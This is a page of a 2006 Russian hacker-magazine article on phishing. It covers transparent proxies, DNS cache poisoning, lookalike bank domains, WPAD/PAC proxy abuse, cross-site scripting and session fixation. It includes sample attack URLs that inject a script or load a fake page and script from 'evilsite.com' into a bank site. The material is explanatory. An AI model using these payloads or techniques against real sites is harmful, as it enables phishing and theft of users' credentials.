Издательский дом ООО "Гейм Лэнд"СПЕЦВЫПУСК ЖУРНАЛА ХАКЕР #70, СЕНТЯБРЬ 2006 г.

ловля на живца

NONAME

Спецвыпуск: Хакер, номер #070, стр. 070-030-3


Для того чтобы успешно выступать в роли проксирующего сервера, атакующий может применять несколько методов:

- ПРОЗРАЧНЫЙ ПРОКСИ. НЕ ЗАМЕТЕН ДЛЯ ПОЛЬЗОВАТЕЛЯ, НО ПРИ ЭТОМ ПЕРЕХВАТЫВАЕТ И ОБРАБАТЫВАЕТ ВЕСЬ ТРАНЗИТНЫЙ ТРАФИК.

- ОТРАВЛЕНИЕ DNS-КЭША. ЗЛОНАМЕРЕННЫЙ ПОЛЬЗОВАТЕЛЬ ВНОСИТ ИЗМЕНЕНИЯ В КЭШ DNS ТАКИМ ОБРАЗОМ, ЧТО ПРИ ЗАПРОСЕ ЛЕГАЛЬНОГО ИМЕНИ ПОЛЬЗОВАТЕЛЮ ВОЗВРАЩАЕТСЯ IP-АДРЕС ПОДСТАВНОГО СЕРВЕРА.

- ПУТАНИЦА С URL. РЕГИСТРАЦИЯ URL, ОЧЕНЬ ПОХОЖИХ НА АТАКУЕМЫЙ ИЛИ ФИШИНГОВЫЙ. НАПРИМЕР, WHITEHOUSE.GOV И .COM ОЧЕНЬ СИЛЬНО ОТЛИЧАЮТСЯ ПО СОДЕРЖАНИЮ. ПЛЮС УЧИТЫВАЮТСЯ САМЫЕ РАЗНЫЕ ОПЕЧАТКИ ПОЛЬЗОВАТЕЛЕЙ (ТИПА MICRO, MICO, MICOR...).

- КОНФИГУРАЦИЯ ПРОКСИ. ВСТРЕЧАЕТСЯ РЕЖЕ ДРУГИХ. БРАУЗЕРЫ МОЖНО АВТОМАТИЧЕСКИ КОНФИГУРИРОВАТЬ С ПОМОЩЬЮ PAC-СКРИПТОВ И ПРОТОКОЛА WPAD (WEB PROXY AUTODISCOVERY PROTOCOL). ТО ЕСТЬ С ПОМОЩЬЮ ЭТИХ СРЕДСТВ МОЖНО НАПРАВИТЬ ПОЛЬЗОВАТЕЛСЯ ЧЕРЕЗ ПОДСТАВНОЙ ПРОКСИ-СЕРВЕР.

[путаница с URL.]

Одна из наиболее простых и банальных техник, которая, тем не менее, прекрасно работает с доверчивыми пользователями - искажение имени домена. В рамках этого метода злоумышленник искажает реальное доменное имя и присваивает его своему серверу. Сходство подставного веб-адреса с реальным в большинстве случаев не вызывает у пользователя подозрений:

- HTTP://PRIVATEBANKING.MYBANK.COM.CH

- HTTP://MYBANK.PRIVATEBANKING.COM

- HTTP://PRIVATEBANKING.MYBONK.COM

- HTTP://PRIVATEBANKING.MYBANK.HACKPROOF.COM

[Cross-site Scripting.]

Атаки cross-site scripting (CSS) используют технику инъекции кода в легитимные веб-приложения. Как правило, возможность применять такие техники связана с огрехами разработчиков этих приложений. Типичный пример атаки CSS выглядит примерно следующим образом:

- ПОЛНАЯ ЗАМЕНА HTML (В КАЧЕСТВЕ ПАРАМЕТРА НАХОДИТСЯ ССЫЛКА НА САЙТ ЗЛОУМЫШЛЕННИКА): HTTP://MYBANK.COM/EBANKING?URL=HTTP://EVILSITE.COM/PHISHING/FAKEPAGE.HTM.

- ВСТАВКА СКРИПТА В URL: HTTP://MYBANK.COM/EBANKING?PAGE=1&CLIENT=<SCRIPT>EVILCODE...

- ПРИНУДИТЕЛЬНАЯ ЗАГРУЗКА ВНЕШНЕГО КОДА: HTTP://MYBANK.COM/EBANKING?PAGE=1&RESPONSE=EVILSITE.COM%21EVILCODE.JS&GO=2.

Суть данной атаки заключается в том, что пользователь вместе с легитимной страницей сайта получает также и содержимое страницы злоумышленника. В данном случае это происходит из-за недоработок при написании кода для веб-приложения банка.

[атака с использованием предопределенного идентификатора сессии.]

В рамках установленной сессии на http-сервере можно отслеживать перемещения пользователя по страницам сайта. В веб-приложениях, для которых требуется аутентификация при помощи идентификатора сессии, могут использоваться cookies, скрытые поля или поля, содержащиеся в URL.

Многие веб-приложения применяют примитивную систему управления состоянием и позволяют устанавливать идентификаторы сессии в рамках клиентского соединения. Данный вид атаки подразумевает, что фишинговое сообщение содержит веб-ссылку на реальный сайт, но вместе с ней содержит и предустановленное поле идентификатора сессии. До тех пор, пока легитимный пользователь не аутентифицируется на сервере, запросы атакующего сервером не обрабатываются, злоумышленник получает сообщения об ошибке (например, 404 File Not Found, 302 Server Redirect и т.д.). Но как только фишер дожидается момента, когда пользователь зайдет по ссылке и аутентифицируется со своим идентификатором, он может воспользоваться его аутентификационными данными с тем же самым (предустановленным) идентификатором сессии. В этом случае злоумышленник может получать доступ к закрытым страницам сайта и перехватывать данные пользователя.

Назад на стр. 070-030-2  Содержание  Вперед на стр. 070-030-4